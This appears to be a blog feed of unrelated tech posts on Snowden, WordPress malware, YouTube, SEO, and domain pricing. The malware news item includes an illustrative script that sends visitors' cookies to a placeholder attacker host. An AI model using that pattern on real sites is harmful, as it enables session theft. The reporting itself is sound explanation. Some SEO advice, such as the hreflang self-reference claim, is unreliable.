Why Edward Snowden loves open source

Published by:

Infamous government whistleblower Edward Snowden believes open source is a fundamentally better way to build and use technology than proprietary software, which he argues disempowers users.

Snowden was interviewed via video from an undisclosed location at the OpenStack Summit in Boston, the conference for the open source cloud computing project OpenStack, and spoke about his personal use of open source technology. In 2013 Snowden, then a government contractor, leaked classified information about government surveillance programs run by the National Security Agency, which brought him worldwide fame.

Speaking specifically about cloud computing technology, Snowden said clouds from Amazon and Google are fine, but noted that customers using these products are “sinking costs into an infrastructure that is not yours… you’re investing into things you don’t control or shape.” Snowden raised the question: “When you’re running things in Google’s cloud, Amazon’s cloud, how do you know when you’re being spied on?” Whether it’s happening legally or illegally, Snowden argues these vendors could use customers’ information “at a layer that’s hidden from you.” There have been no credible reports of cloud vendors spying on customers.

Snowden encouraged attendees of the OpenStack Summit to “direct the future of the internet in a more free and fair way.” One way to do that, he says, is to use open source tools to build computing platforms that customers build and host themselves, which gives users more control over how data is handled.

Amazon Web Services explains on the Data Privacy section of its website that customers control their own data. “Customers maintain ownership of their customer content and select which AWS services process, store and host their customer content. We do not access or use customer content for any purpose other than as legally required and for maintaining the AWS services and providing them to our customers and their end users,” the site states. “We never use customer content or derive information from it for marketing or advertising.” Cloud vendors also offer a variety of ways that customers can encrypt data stored in the public cloud, including offering customers the ability to hold their own keys to the encryption.

Snowden is also worried about data privacy when it comes to smartphones and other technologies. “All systems should be designed to obey the user, they should not deceive or lie to the user. They shouldn’t hide from the user,” he said. Snowden said he’s working on open source code projects that allow users to verify the status of their phones, for example, to ensure that when WiFi or networking features are disabled that they truly are.

Snowden said he used a variety of open source tools to facilitate his 2013 leak of thousands of classified government documents, including the open source Debian operating system and the Tor Project, which helps protect users’ anonymity.

Session Hijacking, Cookie-Stealing WordPress Malware Spotted

Published by:

Researchers have identified a strain of cookie-stealing malware, injected into a legitimate JavaScript file, that sends data to a domain masquerading as a WordPress core domain.

Cesar Anjos, a security analyst at Sucuri, a firm that specializes in WordPress security, came across the malware during an incident response investigation and described it in a blog post Tuesday.

Anjos says it appears attackers used typosquatting, or URL hijacking, to craft the phony domain, code.wordprssapi[.]com. Typosquatting is a technique that usually relies on users making typographical errors when inputting URLs into a web browser. In this case, the fake site is designed to look like a legitimate WordPress domain so it doesn’t appear out of place in the code.

The researcher said it appeared attackers injected malware at the bottom of a legitimate WordPress JavaScript file; the injected code is designed to reroute sensitive information, such as cookies, to the fake domain.

Denis Sinegubko, a senior malware researcher at Sucuri, told Threatpost Wednesday that it’s likely an attacker took advantage of another vulnerability in WordPress to inject the obfuscated code in the first place.

“Modern attacks rarely use one specific vulnerability. They usually scan for multiple known vulnerabilities (mostly in third-party themes and plugins) and then exploit whatever they find,” Sinegubko said.

Anjos points out that in addition to appearing at the bottom of an actual WordPress JavaScript file – wp-includes/js/hoverIntent[.]min[.]js – the code also uses a typical obfuscation pattern, eval(function(p,a,c,k,e,d). The function, commonly used in JavaScript libraries and scripts, tightly packs code that’s later executed when the page loads.
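
For readers unfamiliar with the pattern, here is a deliberately simplified, benign illustration of how an eval(function(p,a,c,k,e,d){…}) wrapper works: numeric tokens in a payload string are substituted back from a keyword list before the result is executed. This is not the code Sucuri found; the payload and keywords are made up, and a real packer also encodes its keyword list.

// Simplified, benign illustration only, not the actual malware.
eval(function (p, a, c, k, e, d) {
  // Replace each base-36 token in the payload p with the matching keyword from k,
  // then return the reconstructed source so the outer eval() executes it.
  while (c--) {
    if (k[c]) {
      p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]);
    }
  }
  return p;
}('0("1 2")', 36, 3, ['console.log', 'hello', 'reader'], 0, {}));
// Unpacks to: console.log("hello reader")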

After Anjos decoded the obfuscated code, he saw the malicious – and now offline – WordPress API site.

In this case, Anjos says a conditional statement hidden at the top of the code excludes cookies from the user agents of search engine crawlers. That “extra mile” by the attacker, Anjos says, helps weed out cookie information from crawlers and bots and “ensures that the data being sent to attackers is more likely to immediately be usable.”

Once it’s been determined the data – in this case, a user’s cookies – is valuable, a script sends it to the malicious site (code.wordprssapi[.]com) so it can be siphoned up and used by attackers, Anjos says.
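
To make the mechanics concrete, here is a rough, hypothetical JavaScript sketch of the two behaviors described above: skipping search-engine user agents and beaconing document.cookie to a remote host. It is illustrative only; the domain is a placeholder, and this is not the code recovered from the infected file.

// Hypothetical illustration of the technique described above, not the real code.
(function () {
  // Skip search-engine crawlers so only real visitors' cookies are collected.
  if (/googlebot|bingbot|yandex|baiduspider/i.test(navigator.userAgent)) {
    return;
  }
  // Send the visitor's cookies to an attacker-controlled host as an image request.
  new Image().src = 'https://attacker.example/collect?c=' +
    encodeURIComponent(document.cookie);
})();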

By stealing a user’s cookies, through what’s essentially a session hijacking attack, an attacker can pretend to be that user and perform any actions the user has permission to perform, at least until the session expires, something that happens after a period of inactivity for many types of online accounts, including WordPress.

The site the URL is mimicking, code.wordpressapi[.]com, isn’t even a legitimate site, the researcher points out. But in this case, that doesn’t matter; the fact that it includes the word “WordPress” is enough to make it look like it belongs, Anjos says; that’s what tricks users.

“By purchasing a domain closely resembling a legitimate website platform or service, some webmasters might overlook this in their code and assume it is an official WordPress domain (which it is not),” Anjos wrote.

Sinegubko is a bit puzzled when it comes to who may be behind the malicious site.

“No clue,” Sinegubko said when asked Wednesday, “As always, WHOIS data is ‘privacy protected,’ the IP (45.32.137.126) points to vultr[.]com network (not a typical choice for hackers especially with the Windows IIS/8.5 server).”

In addition to ensuring they have clean code, webmasters should double check sites to ensure they’re not sending sensitive data, like cookies or passwords, to a third party, Anjos says.

“This is something that all webmasters should be aware of when they are auditing their own code. Be careful and always check that a domain is legitimate, especially if it is involved in collecting or sending information to a third-party site,” the researcher wrote.

YouTube Starts Rolling Out New Website Design, Dark Mode

Published by:

YouTube has started to invite its users to preview a new design of its website, which includes a dark mode suitable for nighttime viewing. The design is also more closely aligned to the look and feel of YouTube’s mobile apps, with YouTube product manager Brian Marquardt promising more consistency across platforms in an announcement blog post.

“Starting today, we’re opening up a preview of the new design to a small group of people from all around the world so we can get feedback,” Marquardt wrote Tuesday. “While we hope you’ll love what we’ve been working on, we’re also really excited to involve the YouTube community so we can make the site even better before sharing it more broadly.”

Users interested in the preview could briefly sign up for it on a special web page Tuesday, but YouTube quickly closed the sign-up after reaching an undisclosed threshold. The Google-owned video site promised to invite additional users in the coming weeks, and plans to eventually make the new look available to all users.

In addition to a night mode, which replaces the white website background with a black theme that’s less jarring when used in low-light situations, the new YouTube also uses a somewhat cleaner design. Two separate menus are being merged into one, and individual menu items are spaced more generously, giving the whole site a lighter look and feel.

But one of the biggest changes may be under the hood: YouTube now uses Polymer, a Google-developed web framework meant to simplify web development. As a result, YouTube may be able to change up its site more easily in the future.

What This Startup Can Teach CMOs About SEO

Published by:

If you’re a Chief Marketing Officer at a digital business in 2017, chances are a large part of your time is already taken up by SEO. And thanks to Google’s ever-changing algorithm, what you learn today may not be true tomorrow, meaning you constantly have to stay up to date on the latest algorithm updates and SEO trends. Luckily, there are a few constant lessons that remain true through algorithm updates and changing times, and that you can apply to build a future-proof site.

The founders of Los Angeles-based Everipedia, Inc. saw that Wikipedia’s model of search engine dominance was ripe for disruption and innovation, and set out to redesign the online encyclopedia for the modern age. To do that, they need to build search engine authority similar to Wikipedia’s dominant presence throughout Google’s results. What started out as a small project in a UCLA dorm room has now turned into one of the world’s largest encyclopedias, with millions of users and a company valuation of $22 million.

Below, Everipedia’s founders share their most important optimization lessons for CMOs that will help bring your website to the top of Google’s search results.

Focus On Mobile Design And Usability

In 2016, mobile overtook desktop as the primary device people use to browse the web, and Google has been quick to update its algorithm to make it more mobile-oriented. Many industries and websites are seeing their share of mobile traffic steadily climb. But even though responsive design has been around for a while now and is well-established, a majority of websites still fall short on mobile usability.

Theodor Forselius, the Head of Design, describes what they have done in regards to mobile optimization: “At Everipedia we have actually focused more on our mobile functionality and usability than we have on desktop. All of our pages on mobile are built with Google’s Accelerated Mobile Pages (AMP) framework, which gives our pages priority in Google’s SERP over competitors.

The AMP framework also significantly improves our page speeds on slow 3G/4G connections which in turn decreases the bounce rate and signals Google that the page is user friendly.”
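
To make the AMP claim concrete, here is a stripped-down sketch of what an AMP page skeleton looks like. The URLs are placeholders, and the mandatory amp-boilerplate style block and its noscript fallback are abbreviated to a comment; a real page copies them verbatim from the AMP documentation.

<!doctype html>
<html amp lang="en">
<head>
<meta charset="utf-8">
<!-- The AMP runtime -->
<script async src="https://cdn.ampproject.org/v0.js"></script>
<!-- Points back to the regular (non-AMP) version of the page -->
<link rel="canonical" href="https://example.com/article.html">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<!-- Required amp-boilerplate <style> and <noscript> fallback go here -->
<title>Example AMP article</title>
</head>
<body>
<h1>Example AMP article</h1>
<p>Article body, using AMP components such as amp-img in place of img.</p>
</body>
</html>

The regular desktop page would in turn point to this document with a link rel="amphtml" tag so Google can discover the AMP version.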

The lesson for CMOs: If the desktop version of your site is better than the mobile version, your priorities are misplaced.

How to fix wp-admin redirecting to wp-login.php and ending at a 404 Not Found page

Published by:

I had several websites where, when I tried to log in via wp-admin, it redirected to wp-login.php, which gave a 404 Not Found error. I tried everything I could; some of the things I did were:

Completely reinstalled WordPress with fresh files

Upgraded my SQL database

Changed the site URLs in the database

Completely rewrote the WordPress .htaccess file

Nothing worked. Finally, a video posted on YouTube gave a solution that was much easier and worked perfectly.

All I had to do was add the following code at the end of the .htaccess file, and it worked perfectly:

<Files wp-login.php>
# With "Order Deny,Allow" the Allow directives are evaluated last, so the final
# "Allow from all" wins and requests to wp-login.php are permitted again,
# effectively overriding any earlier rule that was denying access to the login page.
Order Deny,Allow
Deny from all
Allow from all
</Files>

That was it. This worked, and I was able to fix this persistent error that had kept me from posting to my websites.

You can change the .htaccess file via FTP or via the cPanel file manager.

Enom increasing domain name prices for resellers

Published by:

One of the most popular and reliable domain name companies has finally decided to shoot itself in the foot. The company has sent emails to its clients saying that it will change its pricing structure and will increase prices from US$8.50 to $13.48 per domain.

They said in their email:

“After numerous conversations with our resellers, we’ve come to understand that Enom’s existing reseller pricing plans could use some streamlining and simplification.

We spent the last 90 days analyzing how you and your customers buy, what they pay, and how we can help you drive better profitability. As a result, we are dropping some extension prices, raising others, and discounting a domain add-on that can boost your bottom line.

These changes will go into effect automatically requiring no additional action on your part.”

This move, in my opinion, is going to be a disaster for the company. It seems the company has hit the highest level in its lifecycle and now wishes to plunge downwards. The sharp increase in prices will force resellers to move their domains to other, cheaper resellers like ResellerClub. Our rate with them is $8.50; now they will convert us to the Silver tier, where the new rate is $13.48, which means I will need to charge clients some $15 per year for a .com domain. This will make it impossible to sell domains in a market where companies like 1&1 and GoDaddy offer domains at $2 to $8.50 per domain per year.

In case you need an alternative account for your domains with pricing comparable to the old Enom prices, please email us at oanhwar @ gmail.com

According to Enom, the change in prices will take effect on 15, 2016, when prices on TLDs such as .com, .net and .org will increase.

Here are the new pricing slabs for the different extensions for Enom resellers.


New Pricing
Tier      .COM     .NET     .ORG     .BIZ     .INFO
Platinum  $9.98    $11.98   $11.48   $11.98   $11.48
Gold      $11.48   $13.98   $12.98   $13.48   $12.98
Silver    $13.48   $15.98   $14.98   $15.48   $14.98

As noted above, we’re also lowering prices on many ccTLDs and new generic TLDs. These extensions are set at a base price and aren’t affected by your pricing tier:

TLD New Price TLD New Price TLD New Price TLD New Price
.IT $14.95 .IN $14.95 .ORG.TW $24.95 .NET.NZ $34.95
.JP $54.95 .TW $24.95 .GS $39.95 .ORG.NZ $34.95
.BE $7.95 .COM.TW $24.95 .MS $39.95 .COM.MX $49.95
.AT $18.95 .IDV.TW $24.95 .DE.COM $24.95


TLD New Price TLD New Price TLD New Price TLD New Price
.ACTOR $27.50 .ENGINEER $22.00 .MORTGAGE $33.00 .VET $22.00
.AIRFORCE $22.00 .FORSALE $22.00 .NAVY $22.00 .RIP $13.20
.ARMY $22.00 .FUTBOL $8.80 .NINJA $13.20 .BAND $16.50
.ATTORNEY $27.50 .GIVES $22.00 .PUB $22.00 .SALE $22.00
.AUCTION $22.00 .HAUS $22.00 .REHAB $22.00 .VIDEO $16.50
.CONSULTING $22.00 .IMMOBILIEN $22.00 .REPUBLICAN $22.00 .NEWS $16.50
.DANCE $16.50 .KAUFEN $22.00 .REVIEWS $16.50 .LIVE $16.50
.DEGREE $33.00 .LAWYER $27.50 .ROCKS $8.80 .STUDIO $16.50
.DEMOCRAT $22.00 .MARKET $22.00 .SOCIAL $22.00 .FAMILY $16.50
.DENTIST $27.50 .MODA $22.00 .SOFTWARE $22.00


Can we keep doing the same for SEO in 2016 as we did in 2015?

Published by:


By Jayson DeMers, Founder & CEO, AudienceBloom

The SEO industry is volatile, and every month something new seems to shake up the scene and force us to reevaluate our priorities.

Best practices in 2010 don’t have much in common with best practices today, yet we believe that many of today’s best practices will be relevant indefinitely.

As we near the end of 2015, it’s important to consider which elements of your SEO campaign will be relevant throughout 2016 and which ones might expire or change in unfamiliar ways.

What’s changing?

In 2015, we witnessed a host of changes to the SEO landscape, from tweaks to ranking factors to shifts in potential visibility. In 2016, I’m anticipating more changes along these lines.

By looking back, we can determine Google’s (and other search engines’) priorities, and use those to estimate changes that are around the corner.

Social media will become more important for search visibility

Currently, social media probably plays a minimal role in directly influencing your rankings, though it likely plays strong indirect roles in doing so.

Greater social signals (such as users sharing your content or interacting with your brand) can help you rank higher, but for the most part social media serves as a great external channel to generate more inbound traffic for your site.

However, Google and other search engines are working harder to incorporate social media posts in new ways. For example, tweets are now embedded in certain search results.

[Image: tweets embedded in Google search results]

As this trend continues into 2016, posting on social media will continue to grow in importance to search visibility, though probably not in direct correlation to your site’s rankings.

‘Desktop-focused SEO’ will begin its descent into irrelevancy

In 2015, mobile traffic finally surpassed desktop traffic, and Google released its so-called “Mobilegeddon” update to phase out any sites that weren’t optimized for mobile devices. 2015 was the year mobile became the dominant form of web traffic, and 2016 will be a continuation of the rise of mobile.

Google’s own John Mueller stated this year that mobile-only sites (i.e., sites without a dedicated desktop version) suffer no ranking penalty.

Google has all but abandoned desktop-focused SEO, and you should too as we move into 2016.

Information-based content traffic will cease

Content that provides general information is becoming obsolete. This is in part due to the fact that online content is becoming oversaturated, but even more so due to new technological developments like the Google Knowledge Graph and Windows’ Cortana.

Digital assistants and advanced algorithms can now give users immediate information without ever routing them to an external site.

Instead of trying to write about that general information, shoot for more niche, unique topics.

[Image: Google answering a query directly in the search results]

External links will change

External links have been shrinking in importance for the past three years or so, but new forms of link building have arisen. Brand mentions, which don’t use any explicit link, and off-site reviews are serving as new forms of off-site authority building.

Even newer forms of link building, like links to specific sections within apps, will grow in importance in 2016.

Local SEO will evolve further

The big local SEO shakeup in 2015 was the introduction of the local 3-pack, but thanks to increased interest in wearable technology, greater activity of local businesses, and general consumer needs, expect to see more local SEO changes in 2016.

Reviews and local citations will become more important, and geographic-based searches will become even more specific, serving at the neighborhood level instead of a city or region.

What’s staying the same?
Now that we’ve seen all the ways SEO may change in the next year, I’d like to focus more on what’s staying the same.

I’d like to believe that certain best practices really are timeless, or at the very least, that some best practices have a few more years left in them.

Keep these practices central to your SEO campaign well into 2016, as they aren’t in any immediate risk of being phased out:

Content is still king. Despite some forms of information-based content starting to lose out to digital assistants and aggregated material, unique, quality content is still your best friend.

People still need opinions, insights, entertainment value, and personality, and it’s still going to be your job to give those to them in 2016.

On-site optimization is still about user experience. Some on-site factors are growing or shrinking in importance. For example, site security will be even more important in 2016.

But the bottom line is that on-site tweaks are still focused on user experience. If a change would make your site faster, safer, and easier to use, it’s probably good for SEO (and even if it isn’t, it will help your conversion rates).

Authority building still occurs off-site; to build a reputation, you still need off-site signals like inbound links, social signals, and reviews.

As I mentioned above, the nature of external links is evolving, but brand mentions, off-site listings, and consumer reviews are filling that gap as a new form of off-site authority building. The more relationships you can build with off-site authorities, the better.
Obviously, there are more best practices than these to consider when you’re structuring an SEO campaign for the future, but these blanket concepts will help you understand your main priorities.

There’s a significant degree of uncertainty with these predictions, as historic trends and patterns of growth don’t necessarily dictate a consistent future, and timing, of course, is sensitive to hundreds of unseen variables.

One thing is certain, however; SEO in 2016 will not be the same as SEO in 2015. Technologies, systems, and trends change too rapidly to support any one set of goals or practices for long.

Stay cognizant of industry-related changes and work quickly to adapt when things shift—as long as you keep a reasonable pace of development, you should have no problem outperforming the competition.

How to Fix & Prevent Duplicate Content Issues

Published by:

International SEO is becoming increasingly important for online companies aiming for growth. Thanks to the Internet, expanding your business to any country in the world is just a click away. All you need is an optimized website that caters to audiences across national borders. However, doing so without duplicate content can be easier said than done.
First, there’s the major problem of the language barrier. There are also international search engines that go well beyond Google and Bing: Yandex is the preferred search engine in Russia, for example, and Baidu is popular in China. Even when you simply translate your content into different languages, you risk being penalized by Google and other search engines for duplicate content. In this article, I’ll look closely at the content issues businesses commonly face with international SEO.
Debunking Myths About International SEO

Let’s start by bursting some popular myths circulating around the international SEO realm so that you can stay on the right track.

Myth 1: There’s only one way to effectively penetrate a different country market and this is achieved through different domains.
Fact: All you need is a website that gives out good signals in a particular region, or globally for that matter. There are three approaches for doing so: sub-directory, sub-domain, and ccTLD. You can choose any one according to your business’s budget and team.
Myth 2: You should buy the maximum number of domain names.
Fact: Remember that buying multiple domain names is fine as long as you’re doing so to cover common misspellings of your brand. Beyond that, multiple domain names hold no real value. In fact, I would venture to say that they’ll hinder your international SEO efforts. Page redirections weigh heavily on your website by slowing page load times.
Myth 3: You need .com domains to facilitate the creation of subfolders meant for international SEO.
Fact: The common notion that .com is foolproof when it comes to targeting international traffic is false. Businesses can create subfolders in other gTLDs such as .org and .net. You can also choose to go with a ccTLD.
Myth 4: Domain names with keywords can’t fail.
Fact: Having keywords in the domain name doesn’t guarantee traffic. I recommend you focus on building your brand instead of hunting for such exact-match domains.
Myth 5: Google Translate is a perfect tool.
Fact: In its current form, Google Translate is far from flawless. Ideally, you should hire an expert fluent in the target language to translate the content for better results.
Myth 6: Keywords are the same worldwide.
Fact: This is a major misconception that can drag down your business because keywords vary by region. For instance, singulars and plurals end differently in German. Use a tool like Ubersuggest to zero in on the right keywords for your international SEO campaigns.
Myth 7: One approach for all countries will work.
Fact: Our globe is extremely diverse, so your marketing campaign needs to change based on each culture’s uniqueness. Keep in mind that holidays and festivals vary from country to country.
The Major Issue In International SEO

First and foremost, the biggest problem in international SEO is finding the right approach to target different countries. Second, most businesses struggle to avoid duplicate content. Writing unique content for every page for every location isn’t the best approach; it will inflate your budget and consume valuable time.
Avoiding Duplicate Content in International SEO

Before I get into the topic of duplicate content, you must understand that you can create either a multilingual website or multi-regional website. Here are the differences:

Multilingual website: Multilingual websites offer content in more than one language. For example, your website could include two language versions in Latin and English. Yet, you might still target users in the United States only.
Multi-regional website: Multi-regional websites target customers from different regions. In this case, you might have two versions of your website for two regions. One version might be targeting the UK, whereas the other version targets the US. Both would be in English. Of course, you could also have two versions for two regions in two different languages.
How to Manage Multilingual Versions on Your Website?

Content in different languages is not considered duplicate content if it’s translated manually, with correct grammar and intent. However, using auto-translated text from tools like Google Translate may create duplicate content issues. You can use robots.txt to block search engines from crawling automatically translated pages, which helps avoid duplicate content. When Google indexes incoherent text, it might regard such content as spam and block the page. Steer clear of translating boilerplate content into different languages, as it negatively affects user experience and isn’t acceptable to search engines.
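
As a rough illustration (the path is hypothetical), an automatically translated page can also carry a robots meta tag in its <head> so that search engines drop it from the index even if they crawl it:

<!-- Placed in the <head> of an auto-translated page, e.g. /auto-translated/de/page.html -->
<meta name="robots" content="noindex, follow">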

For international SEO, it’s best to use a single language per page, with a navigation tab that lets visitors choose whichever language they speak. Text should be manually translated. Ensure that each language version can be discovered easily. Refrain from using cookies to switch a user from one language to another. Automatic redirection is also a bad idea, because it prevents visitors from exploring the website the way they want and can keep search engines from indexing your website in its entirety. Use interlinking between language versions so that users can land on the right language with a simple click.

Preferably, your URL should tell the user what language they’re getting. If you want a French user to click on the French version of the text, the URL should contain French words without any English. Google doesn’t use code-level information like the “lang” attribute to understand a website’s language; the search engine reads the content of the page instead. Later in this article, I’ll cover how to use the hreflang tag to stay on the safe side.

Targeting a Specific Country

Google encourages website owners to inform them of their targeted countries for enhancing search results. The search engine has set aside the following elements of international SEO for this purpose:

ccTLD (country-code top-level domain): Each ccTLD relates to a specific country. For instance, .com.au is used for Australia, .in for India, and .de for Germany. Using the appropriate ccTLD gives Google a clear indication that your business is targeting a particular nation.
Location of the server: Though the location of the server is not always a definitive indicator, Google takes it into consideration using the IP address. Google does understand that some websites use content delivery networks and may be hosted in a different country to provide better web server infrastructure.
Use geo-targeting carefully: Geo-targeting is an international SEO tool that can be used to define the targeted country present in the search console. But, you must be careful with it. If you are targeting countries by using ccTLD, then it doesn’t make sense to use it. Geo-targeting is usually used by websites with gTLDs, such as .com or .net. It makes the most sense for generic top-level domain names not affiliated with countries.
Don’t ignore your address and phone number: You do not get more local than your address and phone number. Having a physical international address will boost your authority. This is where Google My Business plays a big part.
Tackling Duplicate Content on International Sites

It’s common for websites to provide similar or identical content in different languages, on different URLs, when targeting different regions. Google is okay with this as long as the users are in different countries. Your website will not be penalized when the translation is manual and accurate. Even though Google still prefers unique content for each version, it understands that producing unique content for every version can be quite tough. Google clearly states that you don’t need to hide such content by blocking Google from crawling it with a robots.txt file or a “noindex” robots meta tag.

The circumstances are entirely different if you’re providing the same content to the same audience through two URLs. Let me explain with an example. Imagine you’ve created yourbusiness.com and yourbusiness.com.au; one targets the USA and the other targets Australia. Since both are in English, this can cause duplicate content. Luckily, it can easily be solved using the hreflang tag, which is widely accepted by search engines globally.
Using the “Hreflang” Tag

As I mentioned earlier, the hreflang tag protects international SEO campaigns from being penalized with duplicate content. It’s usually required by businesses that cater to different languages or countries through sub-domains, subfolders, or ccTLD. The hreflang tag also is important if you have multiple languages for one single targeted country. Here’s how you can go about implementing it:

Step 1: First, we must handle language targeting. You’ll have to list out the URLs that have equivalents in different languages. Any stand-alone or non-equivalent URLs would not need the hreflang tag, so don’t list them.
Step 2: Now comes setting up the tag. This is what a general hreflang tag looks like:
<link rel="alternate" hreflang="es" href="http://es.general.cz/"/>
Let’s envision that the page in question is www.mysite.com/page2.html and you want a German version of it.
You’ll simply change it to
<link rel="alternate" hreflang="de" href="http://www.mysite.com/de/seite2.html"/>.
For a Spanish version, you’d change it to
<link rel="alternate" hreflang="es" href="http://www.mysite.com/es/pagina2.html"/>
All you need are the right language and country codes. Repeat the process for the URLs that you narrowed down during step 1. For a site that targets different countries in the same language, you’ll use code like:
<link rel="alternate" hreflang="x-default" href="http://www.xyz.com/"/>
<link rel="alternate" hreflang="en-gb" href="http://en-gb.xyz.com/page.html"/>
<link rel="alternate" hreflang="en-us" href="http://en-us.xyz.com/page.html"/>

Here, hreflang="x-default" is used to declare a default page for all other countries. This is generally the homepage or another neutral page that works for every country.
Step 3: Please note that the hreflang tags should be placed before the closing </head> tag, and a tag pointing to the page itself shouldn’t be added. For example, the page
http://en-gb.xyz.com/page.html
should only contain the alternate versions, like

<link rel="alternate" hreflang="en-us" href="http://en-us.xyz.com/page.html" />

and for the page http://en-us.xyz.com/page.html, the tag should be:

<link rel="alternate" hreflang="en-gb" href="http://en-gb.xyz.com/page.html" />

After implementation, you can check that what you’ve done works properly by logging into your Google Search Console (Webmaster Tools) account. Proceed to “Search Traffic” and then “International Targeting.” If the hreflang tags were placed properly, you’ll be able to test them using the feature presented there. If problems arise, try using an hreflang tag generator tool to make things easier.
Common Mistakes to Avoid

Incorrect use of language codes: All tags should contain codes as per ISO 639-1. Using incorrect ones will negatively impact your international SEO.
Missing confirmation link: If page A links to page B, page B must link back to page A with a proper hreflang tag.
Challenges with Canonical Tags

The purpose of the canonical tag, or rel=canonical, is simple. Say you have two pages with different URLs that carry exactly the same content. You place a canonical tag on the duplicate pointing at the preferred page, so that Google only indexes that one. Yet, there are several problems that can arise when using the canonical tag.
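
As a quick, hypothetical example (the URLs are placeholders), if http://www.example.com/page.html?sort=price shows exactly the same content as http://www.example.com/page.html, the duplicate version would carry this tag in its <head>:

<link rel="canonical" href="http://www.example.com/page.html"/>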

From what you’ve read so far, there’s no doubt that the hreflang tag is used for geo-targeting, while canonical tags are used to solve duplication issues. With canonical, however, you must maintain a preferred version of each web page, which means spending a lot of time, effort, and likely money. Rel=alternate hreflang tags have an advantage: they can be combined with ccTLDs, which keeps users from getting the notion that they need a .com, and ccTLDs are more apt to achieve better results.
What the Hreflang and Canonical Test Tells Us

State of Digital put hreflang and canonical tags to the test. Here’s what their study found:

Hreflang is suited for international SEO.
When you encounter problems with duplicate content, it’s okay to combine hreflang and canonical tags.
In the absence of problems with duplicate content, you shouldn’t combine hreflang and canonical tags.
As the person in charge of international SEO, there’s no doubt that you’ll be quite busy year-round. Hopefully the information here will be useful in steering clear of costly penalties and de-rankings from duplicate content. If you have additional international SEO tips or unanswered questions, please feel free to use the comment box below.

How to reduce your site’s bounce rates

Published by:

Bounce rates tell you what percentage of people left a given page on your website without viewing any other pages. It’s not to be confused with exit rates, which simply tell you the percentage of visitors that left the site from a page (i.e. they may have viewed other pages first).
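
For example, if 1,000 sessions start on a given page and 700 of them end without the visitor viewing a second page, that page’s bounce rate is 70%.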

Also, it’s important to be aware that users could spend 10 minutes on your page before they leave the site.

In this scenario, it could well be that the page has fulfilled its purpose (or that the user has just forgotten to close it).

What do bounce rates tell you?

Bounce rate is generally used, along with other metrics, as a measure of a site’s ‘stickiness’.

For example, on SEW, I’d like people to click on a link from search, Twitter or some other referral source, find a useful article, then decide to browse further and view all of our other lovely content.

If bounce rates are high, it could mean that our content isn’t doing its job properly, though there are plenty of other possible explanations.

As a rule, I’d generally look at trends over time, and use bounce rates as one of several metrics for measuring the success of a particular page.

For example, this Google Analytics custom segment looking at the percentage of visitors viewing multiple pages provides a measure of a site’s ability to retain users’ interest beyond the page they land on.

[Image: Google Analytics custom segment showing page depth]

Other measures, such as average time on page or using event tracking to see how many people read to the bottom of your posts (as described here by Justin Cutroni) can also help.
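
As a rough sketch of the event-tracking approach (assuming the site already loads Google Analytics’ analytics.js and the template prints a marker element after the post body; article-end is a made-up id):

<div id="article-end"></div>
<script>
// Fire a single 'read to bottom' event when the end-of-article marker scrolls into view.
var marker = document.getElementById('article-end');
var sent = false;
window.addEventListener('scroll', function () {
  if (!sent && window.pageYOffset + window.innerHeight >= marker.offsetTop) {
    sent = true;
    ga('send', 'event', 'Articles', 'read-to-bottom', document.title);
  }
});
</script>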

Still, the principle is important. If you’re the kind of site that wants people to stick around for a while, bounce rates provide a good general guide.

What exactly a good bounce rate is will depend on the type of site you’re running.

Working in online publishing, my experience is that bounce rates for individual articles can be as low as 40% and as high as 98%. The average varies between 70% and 85%; obviously I’m aiming for nearer 70%.

The Google Analytics screenshot below shows some of the more ‘evergreen’ articles we’ve published. As we can see, the bounce rates for such articles are lower than the average, which is nearer 80%.

[Image: Google Analytics bounce rates for evergreen Search Engine Watch articles]

Is a high bounce rate always a bad thing?

In a word, no. It can depend very much on the purpose of the website.

For example, people may want to quickly find a contact number or check facts. If the site enables them to find this information easily, they’ll leave quickly, thus pushing up the bounce rates.

I may need to know how old Al Pacino is (as you do). I can Google his name, click on Wikipedia, and the information is instantly available on the right of the page. Then I hit the back button.

[Image: Al Pacino search result with the answer shown on the right of the page]

Of course, I could linger longer, read more and click some of the links, but if that’s all I want to know, I’m playing a small part in increasing the site’s bounce rates.

For publishers like Search Engine Watch, we’d rather keep people on the site longer, so if someone clicks on a page, decides they’d rather not read the article in question, and leaves, that may mean we haven’t delivered on their expectations.

In the latter case, high bounce rates are a bad thing.

The relationship between bounce rates and SEO

Of course, Google doesn’t know your bounce rates, though it theoretically can find this information from the millions of sites that use Google Analytics.

In theory it would be a useful ranking factor, as it is an indication of how relevant your landing page is to the user’s search query, though allowances would have to be made for the type of site and query.

If someone wants a guide to landing page design and bounces within seconds we can assume the page hasn’t delivered. However, if they just wanted to quickly check the weather for today, then maybe it has served its purpose.

The concept of dwell time, or the ‘long click’ (as explained here by Bill Slawski) is important. It’s similar to – but not the same as – bounce rates. It’s essentially a measure of how long a user spends on a page before returning to the search results page.

Whether this is a ranking factor or not is open to debate, but it certainly makes sense in the light of Google’s search for quality signals.

In essence, it works like this:

If a user clicks through from the SERPs onto a website and then spends some time there, it suggests that the result was relevant to the query and served its purpose. In this case, Google has done its job well in ranking said website highly.

If a user clicks through and then returns to the search results page quickly (or then selects another result) then it suggests the site has not been useful for the searcher. Therefore another site may usurp it in the rankings.
Of course, this is a simplified version, and there are variables. For example, what if the site answered the query immediately (as in my Al Pacino example)?

I would assume that Google would be able to find different metrics for different types of search query so that it could take account of this.

How to reduce bounce rates or how to keep visitors on your site for longer

The following factors should help to reduce bounce rates, but also should serve to keep users on site for a longer period. Or at least remove factors which will make them leave the site.

Here we are, in no particular order…

1. Make sure your pages load quickly

No-one likes slow loading pages, so make sure yours run as fast as they can, on mobile and desktop.

The old rule of thumb from Jakob Nielsen was that users would wait two seconds for a page to load before abandoning the idea. Whatever the exact time, if a site feels slow to load, people will be thinking about bouncing.

This is important from a user experience perspective, but also forms part of Google’s mobile ranking factors.

It looks like we have some work to do on that score…

[Image: page speed test results for Search Engine Watch]

2. Give visitors all the information they may need

This is a point which perhaps applies to ecommerce more than other sites.

Let’s take an example from the travel sector. If you’re researching hotels to stay in, then the obvious destination for many web users is TripAdvisor.

There they can find (in theory) impartial views on the hotel which cut through the sales pitch on the hotel or travel agent’s website. However, once on TripAdvisor, they may be swayed by other hotels.

If you have reviews on site though, or have integrated TripAdvisor reviews on the page, then one reason to head elsewhere is removed.

Here, Best Western hotels show TripAdvisor reviews (good and bad) on hotel pages:

[Image: TripAdvisor reviews shown on a Best Western hotel page]

3. Avoid clickbait

